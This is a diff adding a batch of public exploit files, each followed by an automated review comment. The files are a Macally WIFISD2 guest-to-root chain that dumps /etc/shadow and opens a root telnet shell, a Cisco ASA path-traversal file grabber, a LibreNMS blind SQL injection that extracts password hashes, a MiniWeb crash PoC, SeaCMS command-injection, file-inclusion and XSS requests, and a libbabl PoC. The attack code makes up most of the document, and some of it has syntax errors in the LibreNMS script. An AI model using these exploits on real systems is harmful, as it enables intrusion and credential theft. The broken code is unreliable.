diff --git a/exploits/hardware/webapps/49256.py b/exploits/hardware/webapps/49256.py
new file mode 100755
index 000000000..20f038900
--- /dev/null
+++ b/exploits/hardware/webapps/49256.py
@@ -0,0 +1,140 @@
+# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
+# Date: 03.12.2020 
+# Exploit Author: Maximilian Barz and Daniel Schwendner
+# Vendor Homepage: https://us.macally.com/products/wifisd2
+# Version: 2.000.010
+# Tested on: Kali Linux 5.7.0-kali1-amd64
+# CVE : CVE-2020-29669
+# Reference: https://github.com/S1lkys/CVE-2020-29669/
+
+#!/usr/bin/env/python3
+import requests
+import telnetlib
+import os
+import sys
+import re
+
+banner = '''\033[94m
+  ██████ ▄▄▄█████▓ ▄▄▄       ██▀███   ▄▄▄▄    █    ██  ██▀███    ██████ ▄▄▄█████▓
+▒██    ▒ ▓  ██▒ ▓▒▒████▄    ▓██ ▒ ██▒▓█████▄  ██  ▓██▒▓██ ▒ ██▒▒██    ▒ ▓  ██▒ ▓▒
+░ ▓██▄   ▒ ▓██░ ▒░▒██  ▀█▄  ▓██ ░▄█ ▒▒██▒ ▄██▓██  ▒██░▓██ ░▄█ ▒░ ▓██▄   ▒ ▓██░ ▒░
+  ▒   ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄  ▒██░█▀  ▓▓█  ░██░▒██▀▀█▄    ▒   ██▒░ ▓██▓ ░ 
+▒██████▒▒  ▒██▒ ░  ▓█   ▓██▒░██▓ ▒██▒░▓█  ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒  ▒██▒ ░ 
+▒ ▒▓▒ ▒ ░  ▒ ░░    ▒▒   ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░  ▒ ░░   
+░ ░▒  ░ ░    ░      ▒   ▒▒ ░  ░▒ ░ ▒░▒░▒   ░ ░░▒░ ░ ░   ░▒ ░ ▒░░ ░▒  ░ ░    ░    
+░  ░  ░    ░        ░   ▒     ░░   ░  ░    ░  ░░░ ░ ░   ░░   ░ ░  ░  ░    ░      
+      ░                 ░  ░   ░      ░         ░        ░           ░           
+                                           ░                                     
+\x1b[0m
+Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner 
+'''
+def main():
+    if(len(sys.argv) < 2):
+        print(banner)
+        print("Usage: %s <host> " % sys.argv[0])
+        print("Eg:    %s 1.2.3.4 " % sys.argv[0])
+        return
+    rhost = sys.argv[1]
+    session = requests.Session()
+    guest_creds = "guest_pass"
+    admin_pass_to_set = "Silky123"
+
+    def send_requests():
+        url = "http://"+rhost+"/protocol.csp?function=set"
+        payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/index.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '65',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        
+        r= session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in r.content):
+            print("\033[92m[+] Authentication successful\x1b[0m")
+            print("\t"+str(session.cookies.get_dict()))
+        else:
+            print("\033[91m[+] Authentication failed.\x1b[0m")
+            sys.exit()
+
+        url = "http://"+rhost+"/protocol.csp?fname=security&function=set"    
+        payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/app/user/guest.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '49',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        d = session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in d.content):
+            print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
+            telnet_grep_root_hash()
+            #print("[+] Spawning Admin Shell")
+            #telnet_login()
+        else:
+            print("\033[91m[+] Admin Password change failed\x1b[0m")
+            sys.exit()
+
+
+    def telnet_grep_root_hash():
+        user = "admin"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(admin_pass_to_set.encode('ascii') + b"\n")
+        print("\033[92m[+] Dumping Hashes:\x1b[0m")
+        tn.write(b"cat /etc/shadow\n\r")
+        tn.write(b"exit\n")
+        output = tn.read_all().decode('ascii')
+        L = output.split('\n')
+        for hash in L:
+            if ":" in hash:
+                print("\t"+hash)
+        print("\n\r")
+        for hash in L:
+            if "root" in hash:
+                print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
+                print("\t"+hash)  #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
+                f = open("root_hash","w+")
+                f.write(hash)
+                f.close()
+                crack_root_hash();
+
+
+    def crack_root_hash():
+        f = open("root_hash", "r")
+        hash = f.read()
+        if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
+            print("\033[92mRoot Password: 20080826\x1b[0m\n")
+            telnet_login()
+        else:
+            os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
+
+    def telnet_login():
+        print("\033[92m[+] Spawning Rootshell\x1b[0m")
+        user = "root"
+        root_password="20080826"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(root_password.encode('ascii') + b"\n")
+        tn.interact()
+    print(banner)
+    send_requests()
+
+if(__name__ == '__main__'):
+    main()
\ No newline at end of file
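Review bot: `telnet_grep_root_hash()` writes the recovered `/etc/shadow` entry to `root_hash` in the current working directory with default permissions, and `crack_root_hash()` reopens it with `f = open("root_hash", "r")` and never closes the handle. Both sites should use a context manager, e.g. `with open("root_hash") as f:`, and the file should be created owner-only, since it holds credential material from the device under test. The header comment should also state that a successful run leaves the device's admin password set to the hard-coded `admin_pass_to_set` value, because nothing in the script restores it. Separately, the shebang `#!/usr/bin/env/python3` is malformed and sits below the comment header, so it has no effect; `#!/usr/bin/env python3` on the first line is the working form.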
diff --git a/exploits/hardware/webapps/49262.py b/exploits/hardware/webapps/49262.py
new file mode 100755
index 000000000..3ae7ad1f6
--- /dev/null
+++ b/exploits/hardware/webapps/49262.py
@@ -0,0 +1,113 @@
+# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
+# Date: 12 Dec 2020
+# Exploit Author: Freakyclown@cygenta.co.uk
+# Vendor Homepage: cisco.com
+# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
+# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
+# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
+# CVE : CVE-2020-3452
+# Github : https://github.com/cygenta/CVE-2020-3452
+
+import requests
+
+# Written by freakyclown for @CygentaHQ
+# Cisco ASA Path Traversal
+# CVE-2020-3452
+# Usage: CVE-2020-3452.py {target}"
+# Example: CVE-2020-3452.py 192.168.0.12"
+# Requires - Requests - pip3 install requests
+#
+# This tool takes advantage of the above cve and attempts to
+# download files as listed below, it is suggested that you make
+# a working folder for the outputfiles to avoid confusion if
+# attacking mutliple ASA's
+
+# set your target
+target = input("Enter target IP/Url: ")
+
+
+def grabstuff():
+    for file in files:
+        print("trying: ", file)
+
+        #set request parameters
+        params = (
+            ('type', 'mst'),
+            ('textdomain', '+CSCOE+/'+file),
+            ('default-language', ''),
+            ('lang', '../'),
+        )
+
+        # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
+        response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
+        # write the file to the disk
+        f = open(file,"w")
+        f.write(response.text) 
+        f.close()
+
+
+
+# this is a list of files available to download, more will be added in time
+# if anyone has a list of ASA files, I'd be happy to add here
+files = {
+"sess_update.html",
+"blank.html",
+"noportal.html",
+"portal_ce.html",
+"portal.html",
+"logon_custom.css",
+"svc.html",
+"logo.gif",
+"portal_inc.lua",
+"nostcaccess.html",
+"session.js",
+"portal.js",
+"portal_custom.css",
+"running.conf",
+"tlbrportal_forms.js",
+"logon_forms.js",
+"win.js",
+"portal.css",
+"lced.html",
+"pluginlib.js",
+"useralert.html",
+"ping.html",
+"app_index.html",
+"shshimdo_url",
+"session_password.html",
+"relayjar.html",
+"relayocx.html",
+"color_picker.js",
+"color_picker.html",
+"cedhelp.html",
+"cedmain.html",
+"cedlogon.html",
+"cedportal.html",
+"portal_elements.html",
+"commonspawn.js",
+"common.js",
+"appstart.js",
+"relaymonjar.html",
+"relaymonocx.html",
+"cedsave.html",
+"tunnel_linux.jnlp",
+"ask.html",
+"no_svc.html",
+"preview.html",
+"cedf.html",
+"ced.html",
+"logon_redirect.html",
+"logout.html",
+"tunnel_mac.jnlp",
+"gp-gip.html",
+"auth.html",
+"wrong_url.html",
+"logon.html"}
+
+
+# obvious thing is obvious, try the things and barf if fail
+try:
+    grabstuff()
+except Exception as err:
+    print("Something went wrong sorry")
+    print(err)
\ No newline at end of file
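Review bot: `grabstuff()` writes `response.text` to disk for every name in `files` without looking at `response.status_code`, so a device that rejects the request still produces a full set of output files, which reads as a positive result when the script is used to check whether an appliance is patched. A guard such as `if response.status_code != 200: continue` before the `open()` call, plus a `timeout=` argument on `requests.get`, would make the outcome unambiguous and keep the loop from hanging on an unresponsive host. The write should also use `with open(file, "w") as f:` so the handle is closed if `f.write` raises. `verify=False` is applied without explanation; a comment stating that certificate validation is deliberately off would help readers.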
diff --git a/exploits/linux/local/49259.c b/exploits/linux/local/49259.c
new file mode 100644
index 000000000..524a43d2c
--- /dev/null
+++ b/exploits/linux/local/49259.c
@@ -0,0 +1,57 @@
+# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
+# Date: December 14, 2020
+# Exploit Author: Carter Yagemann
+# Vendor Homepage: https://www.gegl.org
+# Software Link: https://www.gegl.org/babl/
+# Version: libbabl 0.1.62 and newer
+# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
+# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c
+
+/*
+ * Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
+ * and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
+ *
+ * typedef struct
+ * {
+ *   char  *signature;
+ *   size_t size;
+ *   int  (*destructor)(void *ptr);
+ * } BablAllocInfo;
+ *
+ *
+ * signature is used to track whether a chunk was allocated by babl, and if so, whether
+ * it is currently allocated or freed. This is done by either pointing it to the global
+ * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
+ *
+ * Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173):
+ *
+ * void
+ * babl_free (void *ptr,
+ *            ...)
+ * {
+ *   ...
+ *       if (freed == BAI (ptr)->signature)
+ *         fprintf (stderr, "\nbabl:double free detected\n");
+ *
+ *
+ * Or so the developers think. As it turns out, because babl internally uses libc's malloc()
+ * and free(), which has its own data that it stores within freed chunks, most systems will
+ * overwrite babl's signature variable upon freeing, breaking the double free detection.
+ * The simple PoC below demonstrates this:
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#include <babl/babl-memory.h>
+
+int main(int argc, char **argv) {
+    void *buf = babl_malloc(42);
+    babl_free(buf);
+    // BUG: reports an "unknown" pointer warning when the following is clea=
+rly a double free
+    babl_free(buf);
+
+    return 0;
+}
\ No newline at end of file
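Review bot: The file as committed does not compile: the `# Exploit Title:` through `# Compile:` header lines are not valid C (the preprocessor rejects `# Exploit` as an unknown directive), and the `// BUG:` comment inside `main` is split by a mail soft line break (`clea=` / `rly`), which leaves `rly a double free` as a bare statement. The header should be wrapped in a `/* ... */` block and the comment rejoined as `// BUG: reports an "unknown" pointer warning when the following is clearly a double free`. In the documented compile line, `-lbabl-0.1` precedes the source file, which can fail on toolchains that resolve libraries in command-line order; placing the library after `babl-0.1.62_babl_free.c` avoids that.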
diff --git a/exploits/multiple/webapps/49246.py b/exploits/multiple/webapps/49246.py
new file mode 100755
index 000000000..82060e3e5
--- /dev/null
+++ b/exploits/multiple/webapps/49246.py
@@ -0,0 +1,263 @@
+# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
+# Google Dork: Unknown
+# Date: 13-12-2020
+# Exploit Author: Hodorsec
+# Vendor Homepage: https://www.librenms.org
+# Software Link: https://github.com/librenms/librenms
+# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
+# Version: 1.46
+# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
+# CVE : N/A
+
+#!/usr/bin/python3
+
+# EXAMPLE:
+# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
+# [*] Checking if authentication for page is required...
+# [*] Visiting page to retrieve initial token and cookies...
+# [*] Retrieving authenticated cookie...
+# [*] Printing number of rows in table...
+# 1
+# [*] Found 1 rows of data in table 'users'
+#
+# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# librenms
+# [*] Retrieved value 'librenKs' for column 'username' in row 1
+# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
+# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
+#
+# [+] Done!
+
+import requests
+import urllib3
+import os
+import sys
+import re
+from bs4 import BeautifulSoup
+
+# Optionally, use a proxy
+# proxy = "http://<user>:<pass>@<proxy>:<port>"
+proxy = ""
+os.environ['http_proxy'] = proxy
+os.environ['HTTP_PROXY'] = proxy
+os.environ['https_proxy'] = proxy
+os.environ['HTTPS_PROXY'] = proxy
+
+# Disable cert warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Set timeout
+timeout = 10
+
+# Injection prefix and suffix
+inj_prefix = "(select(sleep("
+inj_suffix = ")))))"
+
+# Decimal begin and end
+dec_begin = 48
+dec_end = 57
+
+# ASCII char begin and end
+ascii_begin = 32
+ascii_end = 126
+
+# Handle CTRL-C
+def keyboard_interrupt():
+    """Handles keyboardinterrupt exceptions"""
+    print("\n\n[*] User requested an interrupt, exiting...")
+    exit(0)
+
+# Custom headers
+def http_headers():
+    headers = {
+        'User-Agent': 'Mozilla',
+    }
+    return headers
+
+def check_auth(url,headers):
+    print("[*] Checking if authentication for page is required...")
+    target = url + "/graph.php"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    if "Unauthorized" in r.text:
+        return True
+    else:
+        return False
+
+def get_initial_token_and_cookies(url,headers):
+    print("[*] Visiting page to retrieve initial token and cookies...")
+    target = url + "/login"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    soup = BeautifulSoup(r.text,'html.parser')
+    for n in soup('input'):
+        if n['name'] == "_token":
+            token = n['value']
+            return token,r.cookies
+        else:
+            return None,r.cookies
+
+def get_valid_cookie(url,headers,token,cookies,usern,passw):
+    print("[*] Retrieving authenticated cookie...")
+    appl_cookie = "laravel_session"
+    post_data = {'_token':token,
+                'username':usern,
+                'password':passw,
+                'submit':''}
+    target = url + "/login"
+    r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.text
+    if "Overview | LibreNMS" in res:
+        return r.cookies
+    else:
+        print("[!] No valid response from used session, exiting!\n")
+        exit(-1)
+
+# Perform the SQLi call for injection
+def sqli(url,headers,cookies,inj_str,sleep):
+    comment_inj_str = re.sub(" ","/**/",inj_str)
+    inj_params = {'id':'1',
+                'stat':'none',
+                'type':'port_mac_acc_total',
+                'sort':comment_inj_str,
+                'debug':'1'}
+    inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())
+    # Do GET request
+    r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.elapsed.total_seconds()
+    if res >= sleep:
+        return True
+    elif res < sleep:
+        return False
+    else:
+        print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
+        exit(-1)
+
+# Extract rows
+def get_rows(url,headers,cookies,table,sleep):
+    rows = ""
+    max_pos_rows = 4
+    # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
+    for pos in range(1,max_pos_rows+1):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop decimals
+        direction = "="
+        for num_rows in range(dec_begin,dec_end+1):
+            row_char = chr(num_rows)
+            inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                rows += row_char
+                print(row_char,end='',flush=True)
+                break
+    if rows != "":
+        print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
+        return int(rows)
+    else:
+        return False
+
+# Loop through positions and characters
+def get_data(url,headers,cookies,row,column,table,sleep):
+    extracted = ""
+    max_pos_len = 50
+    # Loop through length of string
+    # Not very efficient, should use a guessing algorithm
+    print("[*] Extracting strings from row " + str(row+1) + "...")
+    for pos in range(1,max_pos_len):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop through ASCII printable characters
+        direction = "="
+        for guess in range(ascii_begin,ascii_end+1):
+            extracted_char = chr(guess)
+            inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                extracted += chr(guess)
+                print(extracted_char,end='',flush=True)
+                break
+    return extracted
+
+# Main
+def main(argv):
+    if len(sys.argv) == 5:
+        usern = sys.argv[1]
+        passw = sys.argv[2]
+        url = sys.argv[3]
+        sleep = int(sys.argv[4])
+    else:
+        print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
+        exit(0)
+
+    # Random headers
+    headers = http_headers()
+
+    # Do stuff
+    try:
+        # Get a valid initial token and cookies
+        token,cookies = get_initial_token_and_cookies(url,headers)
+        
+        # Check if authentication is required
+        auth_required = check_auth(url,headers)
+
+        if auth_required:
+            # Get an authenticated session cookie using credentials
+            valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw)
+        else:
+            valid_cookies = cookies
+            print("[+] Authentication not required, continue without authentication...")
+
+        # Setting the correct vulnerable page
+        url = url + "/graph.php"
+
+        # The columns to retrieve
+        columns = ['username','password']
+
+        # The table to retrieve data from
+        table = "users"
+
+        # Getting rows
+        print("[*] Printing number of rows in table...")
+        rows = get_rows(url,headers,valid_cookies,table,sleep)
+        if not rows:
+            print("[!] Unable to retrieve rows, checks requests.\n")
+            exit(-1)
+
+        # Getting values for found rows in specified columns
+        for column in columns:
+            print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
+            for row in range(0,rows):
+                # rowval_len = get_length(url,headers,row,column,table)
+                retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep)
+                print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1))
+        # Done
+        print("\n[+] Done!\n")
+
+    except requests.exceptions.Timeout:
+        print("[!] Timeout error\n")
+        exit(-1)
+    except requests.exceptions.TooManyRedirects:
+        print("[!] Too many redirects\n")
+        exit(-1)
+    except requests.exceptions.ConnectionError:
+        print("[!] Not able to connect to URL\n")
+        exit(-1)
+    except requests.exceptions.RequestException as e:
+        print("[!] " + str(e))
+        exit(-1)
+    except requests.exceptions.HTTPError as e:
+        print("[!] Failed with error code - " + str(e.code) + "\n")
+        exit(-1)
+    except KeyboardInterrupt:
+        keyboard_interrupt()
+        exit(-1)
+
+# If we were called as a program, go execute the main function.
+if __name__ == "__main__":
+    main(sys.argv[1:])
\ No newline at end of file
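Review bot: In `main()`, the `except requests.exceptions.HTTPError` clause can never run, because `HTTPError` is a subclass of `RequestException` and the broader clause is listed first; it also reads `e.code`, which requests' `HTTPError` does not define. The clause should move above `RequestException` and use `e.response.status_code`, or be dropped, since no call in the file invokes `raise_for_status()`. The account password is taken from `sys.argv[2]`, which exposes it in the process list and shell history, and every request is sent with `verify=False` while the certificate warning is suppressed. Reading the password with `getpass.getpass()` and making certificate checking the default would be safer handling of the tester's own credentials.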
diff --git a/exploits/multiple/webapps/49247.py b/exploits/multiple/webapps/49247.py
new file mode 100755
index 000000000..8819ba6af
--- /dev/null
+++ b/exploits/multiple/webapps/49247.py
@@ -0,0 +1,55 @@
+# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
+# Date: 13.12.2020
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://sourceforge.net/projects/miniweb/
+# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
+# Version: 0.8.19
+# Tested on: Win7 x86
+# Researchers: Security For Everyone Team - https://securityforeveryone.com
+
+'''
+Description
+
+ MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
+ first parameter in a POST request.
+
+Exploitation
+
+ The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
+ if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.
+
+About Security For Everyone Team
+
+We are a team that has been working on cyber security in the industry for a long time. 
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list
+
+'''
+
+#!/usr/bin/python
+
+import socket
+import sys
+import struct
+
+if len(sys.argv) != 2 :
+	print "[+] Usage : python exploit.py [VICTIM_IP]"
+	exit(0)
+
+TCP_IP = sys.argv[1]
+TCP_PORT = 8000
+
+xx = "A"*2038 #4085
+
+http_req = "POST /index.html HTTP/1.1\r\n"
+http_req += "Host: 192.168.231.140\r\n"
+http_req += "From: header-data\r\n"
+http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+http_req += xx + "=param_data1&param_name2=param_data2"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((TCP_IP, TCP_PORT))
+print "[+] Sending exploit payload..."
+s.send(http_req)
+s.close()
\ No newline at end of file
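Review bot: The script is Python 2 only (`print "[+] Usage ..."` is a statement), but nothing in the header says so, and the `#!/usr/bin/python` line sits below the docstring where it has no effect. A header line such as `# Requires: Python 2` would remove the ambiguity for anyone reproducing the crash against a test build. `struct` is imported and never used, and the socket has no timeout and is not closed if `connect` or `send` raises; `s.settimeout(...)` and a `try`/`finally` around the send would cover that.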
diff --git a/exploits/multiple/webapps/49249.txt b/exploits/multiple/webapps/49249.txt
new file mode 100644
index 000000000..f7202209a
--- /dev/null
+++ b/exploits/multiple/webapps/49249.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F
+
+Vulnerable parameters:ip
+
+payload:";phpinfo();//
\ No newline at end of file
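Review bot: The write-up does not state the precondition for the request: it targets what appears to be the admin directory (`/SeaCMS111/5f9js3/admin_ip.php`) and carries a `PHPSESSID` cookie, so it presumably needs an authenticated administrator session, which matters when rating severity. A header line such as `# Privileges required: authenticated admin (confirm)` would cover it; the same applies to 49250.txt and 49251.txt, whose requests use the same admin path and cookies. The title names 'ip and weburl', but only `ip` is listed under `Vulnerable parameters`, so either the title or the body should be adjusted. No fix reference or mitigation is given.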
diff --git a/exploits/multiple/webapps/49250.txt b/exploits/multiple/webapps/49250.txt
new file mode 100644
index 000000000..acedb7419
--- /dev/null
+++ b/exploits/multiple/webapps/49250.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+Vulnerable parameters: file
+
+payload:C:/windows/system.ini
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49251.txt b/exploits/multiple/webapps/49251.txt
new file mode 100644
index 000000000..fec335073
--- /dev/null
+++ b/exploits/multiple/webapps/49251.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 97
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4
+
+Vulnerable parameters: checkuser
+
+payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
\ No newline at end of file
